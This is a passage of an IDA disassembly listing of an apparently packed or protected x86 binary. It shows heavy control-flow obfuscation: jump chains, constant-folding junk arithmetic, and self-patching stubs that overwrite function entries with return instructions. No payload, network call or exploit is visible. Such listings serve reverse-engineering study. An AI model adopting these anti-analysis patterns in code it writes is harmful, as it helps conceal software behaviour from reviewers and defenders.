loc_43F936: ; CODE XREF: ut7h7i2x:00443C0Aj
; sub_43CCC3+16D34j
push 8220A8CDh
jmp loc_455E04
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_43F940: ; CODE XREF: ut7h7i2x:0043BDD1j
test edi, esi
jmp loc_455847
; ---------------------------------------------------------------------------
loc_43F947: ; CODE XREF: ut7h7i2x:loc_456107j
push ebp
mov ebp, ecx
xchg ebp, [esp]
shl edx, 1
and eax, ecx
jmp loc_4484AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_43F956: ; CODE XREF: sub_44E5AB:loc_457D67j
rol eax, 1
add eax, 58829293h
call sub_43AA94
mov ds:off_41D094, eax
lea eax, sub_44E5AB
mov byte ptr [eax], 0C3h
jmp sub_44E5AB
; ---------------------------------------------------------------------------
loc_43F977: ; CODE XREF: sub_44E5AB:loc_44903Ej
mov eax, [esp+8+var_8]
push esi
jmp loc_43A81B
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_43F980: ; CODE XREF: sub_44DF79-F0BEj
or edi, 93F15B83h
mov ebx, [ebp+0]
loc_43F989: ; CODE XREF: sub_44DF79:loc_4410DAj
mov eax, 3CFDF720h
push ebx
jmp loc_442926
; END OF FUNCTION CHUNK FOR sub_44DF79
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_232. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43F995: ; CODE XREF: sub_442B3B+D5C6j
jmp loc_45760E
; END OF FUNCTION CHUNK FOR sub_442B3B
; =============== S U B R O U T I N E =======================================
sub_43F99A proc near ; DATA XREF: ut7h7i2x:00446B3Do
call nullsub_487
jmp ds:dword_41D104
sub_43F99A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457AEF
loc_43F9A5: ; CODE XREF: sub_457AEF-EE60j
jmp loc_45953A
; END OF FUNCTION CHUNK FOR sub_457AEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D3B0
loc_43F9AA: ; CODE XREF: sub_44D3B0-D043j
jmp nullsub_95
; END OF FUNCTION CHUNK FOR sub_44D3B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_487. PRESS KEYPAD "+" TO EXPAND]
dd offset sub_44C6B4
; ---------------------------------------------------------------------------
jmp loc_443CDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A06
loc_43F9B9: ; CODE XREF: sub_443A06:loc_45314Ej
jnz loc_44FA4B
jmp loc_439ACE
; END OF FUNCTION CHUNK FOR sub_443A06
; ---------------------------------------------------------------------------
loc_43F9C4: ; CODE XREF: ut7h7i2x:0044B2BAj
add esi, edi
; =============== S U B R O U T I N E =======================================
sub_43F9C6 proc near ; CODE XREF: sub_45A25C-DADDp
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004476EE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044D55B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00454DDA SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
xchg edx, [esp-4+arg_0]
push 0
push ecx
jmp loc_44D55B
sub_43F9C6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43F9D5: ; CODE XREF: sub_442B3B+13F45j
jnz loc_44EE02
mov eax, [ebp+8]
push offset loc_44EDEE
jmp nullsub_265
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_43F9E8: ; CODE XREF: ut7h7i2x:00450D08j
cdq
; START OF FUNCTION CHUNK FOR sub_44865D
loc_43F9E9: ; CODE XREF: sub_44865D+A085j
add eax, 0DF7CB7CAh
popf
xchg eax, [esp+0Ch+var_C]
jmp loc_43AEBE
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A5C0
loc_43F9F8: ; CODE XREF: sub_43A5C0:loc_442484j
jz loc_445C52
jmp loc_4462E3
; END OF FUNCTION CHUNK FOR sub_43A5C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_43FA03: ; CODE XREF: sub_44064B:loc_453BB0j
shl eax, 3
loc_43FA06: ; CODE XREF: sub_44064B:loc_4558C7j
mov edx, [ebp+8]
or [edx-8], eax
jmp loc_45A27F
; ---------------------------------------------------------------------------
loc_43FA11: ; CODE XREF: sub_44064B+16E6Fj
; sub_44064B+193C9j
cmp dword ptr [ebp-10h], 1
jnz loc_4581E1
mov eax, [ebp+8]
mov eax, [eax-8]
jmp loc_43E348
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
loc_43FA26: ; CODE XREF: ut7h7i2x:0044FB2Dj
sbb ebp, esi
jg loc_458CBD
mov ecx, [edi]
loc_43FA30: ; CODE XREF: ut7h7i2x:loc_43AF4Aj
call nullsub_491
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_491. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_43FA37: ; CODE XREF: sub_4549F0+5FC0j
jmp loc_44719A
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_43FA3C: ; CODE XREF: sub_459B58-1E076j
jmp nullsub_401
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AC40
loc_43FA41: ; CODE XREF: sub_44AC40-F6F7j
jmp loc_45293C
; END OF FUNCTION CHUNK FOR sub_44AC40
; ---------------------------------------------------------------------------
loc_43FA46: ; CODE XREF: ut7h7i2x:004397A4j
call sub_44E2C4
jmp loc_45961C
; =============== S U B R O U T I N E =======================================
sub_43FA50 proc near ; CODE XREF: sub_44697F:loc_443EFAp
; ut7h7i2x:00454E80j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A561 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442851 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446D76 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AF36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454023 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A678 SIZE 0000001B BYTES
xchg edi, [esp+0]
pop edi
jz loc_442851
pop edx
mov eax, [esp-8+arg_4]
push edx
jmp loc_44AF36
sub_43FA50 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43FA64: ; CODE XREF: sub_452B14+10j
add esi, 0FDF97F02h
test eax, esi
pop esi
jz loc_43CEE8
jmp loc_450F91
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_43FA78: ; CODE XREF: ut7h7i2x:00439F62j
cmp ebp, 0BC8F028Ch
jmp loc_453D01
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_43FA83: ; CODE XREF: sub_457A0D:loc_454F81j
jno loc_449DCD
sbb esi, edx
jmp loc_44F44F
; END OF FUNCTION CHUNK FOR sub_457A0D
; =============== S U B R O U T I N E =======================================
sub_43FA90 proc near ; DATA XREF: sub_43E7EC+BE92o
mov edx, esi
call sub_44339F
loc_43FA97: ; DATA XREF: sub_44DD39+6092o
jmp locret_452A4F
sub_43FA90 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442C22
loc_43FA9D: ; CODE XREF: sub_442C22+17j
jmp loc_43F839
; END OF FUNCTION CHUNK FOR sub_442C22
; ---------------------------------------------------------------------------
loc_43FAA2: ; CODE XREF: ut7h7i2x:0044444Dj
call sub_44E2C4
test al, al
jz loc_43EF1B
jmp loc_45314E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_43FAB4: ; CODE XREF: sub_439B27+6j
; sub_43F0B0:loc_43A22Fj ...
call sub_43F1B2
; END OF FUNCTION CHUNK FOR sub_43F1B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_43FABA: ; CODE XREF: sub_439BD1+4C63j
jmp loc_43E633
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_43FABF: ; CODE XREF: ut7h7i2x:0045AA6Cj
ja loc_4526B3
xor ebp, 50AFB274h
loc_43FACB: ; CODE XREF: ut7h7i2x:0044BFD6j
xor eax, 8146BCF7h
call sub_43AA94
mov ds:dword_41D18C, eax
jmp loc_457D76
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_496. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43FAE2: ; CODE XREF: sub_43D021+126D7j
jmp loc_45372F
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_43FAE7: ; CODE XREF: sub_4549F0:loc_446819j
sub eax, 9A960235h
jb loc_43970E
loc_43FAF3: ; CODE XREF: ut7h7i2x:00442921j
jmp loc_4536E5
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
push ebp
mov esi, 3993C2Ch
jmp loc_43970E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_43FB03: ; CODE XREF: sub_43EDD8:loc_43B9ACj
cmp eax, 0B90028h
jmp loc_457D0A
; END OF FUNCTION CHUNK FOR sub_43EDD8
; ---------------------------------------------------------------------------
loc_43FB0E: ; CODE XREF: ut7h7i2x:loc_442868j
xchg eax, [esp]
push offset sub_43F8FF
jmp locret_43BD53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4474B1
loc_43FB1B: ; CODE XREF: sub_4474B1+20D0j
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
call sub_44022F
; END OF FUNCTION CHUNK FOR sub_4474B1
; START OF FUNCTION CHUNK FOR sub_44D15F
loc_43FB2B: ; CODE XREF: sub_44D15F+5j
jmp loc_452351
; END OF FUNCTION CHUNK FOR sub_44D15F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_43FB30: ; CODE XREF: sub_441765+684Cj
jmp nullsub_386
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
push ecx
mov ecx, eax
xchg ecx, [esp]
push ebx
push 0AF67A2F9h
pop ebx
add ebx, ds:4000F8h
test ebx, 1000000h
jmp loc_443DBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_43FB53: ; CODE XREF: sub_449808+1j
push 6FFCCEA8h
pop esi
rol esi, 1Eh
sub esi, 0AF665A88h
add esi, 93ABA59Eh
loc_43FB68: ; CODE XREF: sub_4433C5:loc_43F736j
jmp loc_443F61
; END OF FUNCTION CHUNK FOR sub_449808
; =============== S U B R O U T I N E =======================================
sub_43FB6D proc near ; DATA XREF: ut7h7i2x:0045586Fo
xchg esi, [esp+0]
jmp nullsub_5
sub_43FB6D endp
; ---------------------------------------------------------------------------
jmp ds:dword_41D0C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43FB7B: ; CODE XREF: sub_4524FE+4828j
jmp loc_44A971
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452653
loc_43FB80: ; CODE XREF: sub_452653+10j
jmp loc_43B3BA
; END OF FUNCTION CHUNK FOR sub_452653
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add byte ptr [ecx+5A000081h], 8Bh
add al, 24h
push edx
push offset loc_441593
jmp loc_43DDD3
; ---------------------------------------------------------------------------
loc_43FB9A: ; CODE XREF: ut7h7i2x:loc_4455D1j
jz loc_45A2EB
jmp loc_43B48F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_43FBA5: ; CODE XREF: sub_446CA0+1173j
; ut7h7i2x:0044C3C3j ...
inc dword ptr [ebp-20h]
dec dword ptr [ebp-2Ch]
jnz loc_450896
jmp loc_447872
; END OF FUNCTION CHUNK FOR sub_453E14
; =============== S U B R O U T I N E =======================================
sub_43FBB6 proc near ; DATA XREF: sub_458AFD+8o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00446904 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AF14 SIZE 00000011 BYTES
cdq
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_44AF14
sub_43FBB6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43FBCC: ; CODE XREF: ut7h7i2x:004403ACj
and ebp, edx
jns loc_457CBC
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_43FBD4: ; CODE XREF: sub_44DD39:loc_440390j
add eax, 47FFE621h
add eax, ebp
add eax, 0CF02AC37h
mov eax, [eax]
jmp loc_452D4E
; END OF FUNCTION CHUNK FOR sub_44DD39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_43FBE9: ; CODE XREF: sub_439B67+17351j
xor eax, 0B040C394h
sub eax, ds:4000F1h
xor eax, 16D25736h
xchg eax, [esp+0]
push 10h
push 7F080B1Eh
pop eax
jmp loc_448176
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
test edx, ebx
jmp loc_441939
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_43FC12: ; CODE XREF: sub_4589C7-129F3j
pop edi
rol edi, 17h
xor edi, 8E16F14h
add edi, 0DD1E33F9h
jmp loc_459D41
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_43FC27: ; CODE XREF: sub_44F495-11C69j
mov ds:off_41D158, eax
lea eax, loc_45078F
mov byte ptr [eax], 0C3h
jmp loc_45078F
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
call nullsub_216
jmp ds:dword_41D15C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jno loc_444AFD
mov eax, [esp]
jmp loc_44E270
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C3B7
loc_43FC55: ; CODE XREF: sub_43C3B7+15j
xor ebx, 0D4E35835h
rol ebx, 18h
or ebx, 948C2539h
add ebx, 208544A9h
jmp loc_43A90B
; END OF FUNCTION CHUNK FOR sub_43C3B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_43FC6F: ; CODE XREF: sub_439D5C+1B71Ej
shl ebx, 1Ch
loc_43FC72: ; CODE XREF: sub_439D5C:loc_4436EBj
push 0A1829D65h
pop eax
sub eax, 193D9F14h
rol eax, 4
jmp loc_44CC3E
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454A2B
loc_43FC86: ; CODE XREF: sub_454A2B:loc_43BBCFj
mov edx, eax
pop eax
add edx, 0D6B776B3h
rol edx, 0Bh
and edx, 58B73362h
loc_43FC98: ; CODE XREF: ut7h7i2x:loc_44C5D3j
add edx, 0E840B152h
mov [edx], eax
pop edx
jmp loc_455F03
; END OF FUNCTION CHUNK FOR sub_454A2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_43FCA6: ; CODE XREF: sub_43BA9E+1DF62j
or edx, ecx
jmp loc_44037D
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4550FF
loc_43FCAD: ; CODE XREF: sub_4550FF+Dj
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_448223
call sub_45941F
push offset loc_44A8B5
jmp nullsub_213
; END OF FUNCTION CHUNK FOR sub_4550FF
; ---------------------------------------------------------------------------
rol esi, 0Bh
sub eax, ebp
jmp sub_4529ED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_392. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_43FCD3: ; CODE XREF: sub_452D3D+3BDBj
; ut7h7i2x:004575ADj
or edi, edx
loc_43FCD5: ; CODE XREF: sub_4431FF-A165j
add eax, 7170B102h
mov eax, [eax]
push 0C53FD06h
pop edx
jmp loc_44ACA9
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
loc_43FCE8: ; CODE XREF: ut7h7i2x:004541EBj
jz loc_456C86
; =============== S U B R O U T I N E =======================================
sub_43FCEE proc near ; CODE XREF: sub_44D066+Dp
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D837 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D9D2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043DDFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441ECD SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004430EF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443DE0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044563C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445978 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B91F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C702 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E51A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E7B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F38D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00450FB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004515B8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452DC7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453344 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00453A6A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004548CF SIZE 0000000F BYTES
xchg edi, [esp+4+var_4]
pop edi
push 4FB6FC75h
jmp loc_43D837
sub_43FCEE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43FCFC: ; CODE XREF: sub_4433C5:loc_43BB0Bj
jnz loc_4475EE
jmp loc_457EBB
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43FD07: ; CODE XREF: sub_447CBE+D676j
jz loc_446C23
jmp loc_455DFF
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43FD12: ; CODE XREF: sub_439BF8:loc_4520D1j
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4560FB
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
push offset loc_4560D0
jmp nullsub_224
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_43FD33: ; CODE XREF: ut7h7i2x:0043F47Dj
sub ebx, 0D0677965h
or ebx, 4D7C9345h
rol ebx, 8
test ebx, 400h
jmp loc_43ED70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457AEF
loc_43FD4D: ; CODE XREF: sub_457AEF+1A60j
xchg ebp, [esp+0]
call sub_43964B
; END OF FUNCTION CHUNK FOR sub_457AEF
; START OF FUNCTION CHUNK FOR sub_440944
loc_43FD55: ; CODE XREF: sub_440944+F19Ej
jmp loc_45A9E1
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
loc_43FD5A: ; CODE XREF: ut7h7i2x:00439F30j
shr edx, 0Fh
loc_43FD5D: ; CODE XREF: ut7h7i2x:loc_447613j
call sub_43FD68
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_43FD63: ; CODE XREF: sub_44E2C4+152Fj
jmp nullsub_1
; END OF FUNCTION CHUNK FOR sub_44E2C4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FD68 proc near ; CODE XREF: ut7h7i2x:loc_43FD5Dp
; ut7h7i2x:loc_44323Ap
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043E8EB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446B1A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044989E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00451C52 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455918 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567CE SIZE 0000000D BYTES
push ebp
mov ebp, esp
push ecx
lea eax, loc_439C7D
jnb loc_4567CE
push ebx
push 7E36F0B0h
xchg ebp, [esp+0Ch+var_C]
mov ebx, ebp
pop ebp
add ebx, 6BD77F7Eh
cmp ebx, 394CF44Ah
jmp loc_451C52
sub_43FD68 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_43FD95: ; CODE XREF: sub_459B58-14036j
jnz loc_43BADA
cdq
; END OF FUNCTION CHUNK FOR sub_459B58
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_43FD9C: ; CODE XREF: sub_44DB48:loc_44A1E6j
call sub_453D8B
call sub_43B9B1
loc_43FDA6: ; CODE XREF: sub_44B5CF-A65Bj
cmp ecx, eax
jmp loc_43F56B
; END OF FUNCTION CHUNK FOR sub_44DB48
; =============== S U B R O U T I N E =======================================
sub_43FDAD proc near ; DATA XREF: sub_45ADF0-EC7Bo
; FUNCTION CHUNK AT 00445858 SIZE 00000005 BYTES
add ecx, 0EECE6967h
xchg ecx, [esp+0]
jmp loc_445858
sub_43FDAD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_43FDBB: ; CODE XREF: sub_455060:loc_43F694j
push edx
call sub_45173A
mov eax, 38F24592h
push eax
mov eax, ecx
xchg eax, [esp+0]
jmp loc_4435C3
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
cdq
jmp loc_45195A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455CF9
loc_43FDD7: ; CODE XREF: sub_455CF9:loc_442522j
xor esi, 3D121456h
sub esi, ds:4000F4h
xor esi, 95F85DD9h
add esi, 0B94E5FE7h
call sub_450FDE
loc_43FDF4: ; CODE XREF: ut7h7i2x:0044AB43j
jmp loc_4582D3
; END OF FUNCTION CHUNK FOR sub_455CF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_43FDF9: ; CODE XREF: sub_4544E6:loc_43AE92j
call sub_4456C9
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jle loc_44F4B4
mov eax, [ebp-4]
jmp loc_453074
; END OF FUNCTION CHUNK FOR sub_4544E6
; =============== S U B R O U T I N E =======================================
sub_43FE13 proc near ; CODE XREF: sub_43F7A5p
; ut7h7i2x:004456B1j
; FUNCTION CHUNK AT 00458C2A SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push ebp
mov ebp, esp
push offset sub_443BC5
jmp loc_458C2A
sub_43FE13 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4516C6
loc_43FE24: ; CODE XREF: sub_4516C6:loc_454843j
xor edx, 11E0E910h
rol edx, 1Eh
; END OF FUNCTION CHUNK FOR sub_4516C6
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_43FE2D: ; CODE XREF: sub_453D8B:loc_453D90j
xor edx, 864D13D5h
xor eax, edx
pop edx
add eax, 53E14D16h
jmp loc_43B085
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_43FE41: ; CODE XREF: sub_439BD1:loc_44FFB4j
push ecx
push 0E2FF25B9h
loc_43FE47: ; CODE XREF: ut7h7i2x:loc_4426BBj
pop ecx
add ecx, 0DCBFECEAh
rol ecx, 1Eh
xor ecx, 0EFEFC4ACh
xchg ecx, [esp+4+var_4]
lea eax, [ebp-1C8h]
jmp loc_43BD23
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
and edx, 0D7F4D95Dh
jmp sub_44C42A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_43FE70: ; CODE XREF: sub_43F7A5-63C6j
mov eax, [eax]
push offset sub_44615D
jmp nullsub_179
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_43FE7C: ; CODE XREF: sub_449E96:loc_45A1DCj
mov eax, 20413B0Fh
push offset loc_44CA94
jmp nullsub_423
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43FE8B: ; CODE XREF: sub_44C791+Cj
pop ebx
jmp loc_44E56A
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
ror ebx, 1Ah
jmp loc_45912A
; ---------------------------------------------------------------------------
jnz loc_43F90D
ror ebp, 7
jmp sub_43AF72
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_43FEAB: ; CODE XREF: sub_448CDC-D29Dj
adc ecx, ebp
mov [ebp+0], edi
loc_43FEB0: ; CODE XREF: sub_448CDC:loc_454356j
call sub_45500F
mov edx, 65DE9EC5h
jmp loc_446017
; END OF FUNCTION CHUNK FOR sub_448CDC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_283. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43FEC0: ; CODE XREF: ut7h7i2x:00440675j
mov eax, [ebp-8]
call sub_45A8C1
loc_43FEC8: ; CODE XREF: ut7h7i2x:0045A882j
jmp locret_440D00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_43FECD: ; CODE XREF: sub_43F0B0+9133j
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43FAB4
jmp loc_459AE8
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43FEDE: ; CODE XREF: sub_43A556+5DBFj
jz loc_4439EF
jmp loc_44F532
; END OF FUNCTION CHUNK FOR sub_43A556
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_469. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_43FEEA: ; CODE XREF: sub_4508DB-2873j
jmp loc_440C86
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F613
loc_43FEEF: ; CODE XREF: sub_44F613-A5D2j
jmp loc_43D787
; END OF FUNCTION CHUNK FOR sub_44F613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_43FEF4: ; CODE XREF: sub_44E6B4:loc_451233j
xor eax, 26915947h
call sub_43AA94
call sub_44458B
; END OF FUNCTION CHUNK FOR sub_44E6B4
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43FF04: ; CODE XREF: sub_452B14-A51Ej
jmp loc_442AF7
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43FF09: ; CODE XREF: sub_439BF8+C0A9j
jmp loc_44FE29
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_43FF0E: ; CODE XREF: sub_456B19:loc_44E658j
adc ebx, ecx
jmp loc_4523E8
; END OF FUNCTION CHUNK FOR sub_456B19
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452950
loc_43FF16: ; CODE XREF: sub_452950+5DE7j
jmp nullsub_341
; END OF FUNCTION CHUNK FOR sub_452950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44871F
loc_43FF1B: ; CODE XREF: sub_44871F:loc_444524j
jmp loc_455572
; END OF FUNCTION CHUNK FOR sub_44871F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43FF20: ; CODE XREF: sub_43D021+8j
jz loc_43EA34
jmp loc_4529D9
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_43FF2B proc near ; DATA XREF: sub_44A7D2+Eo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00443661 SIZE 00000005 BYTES
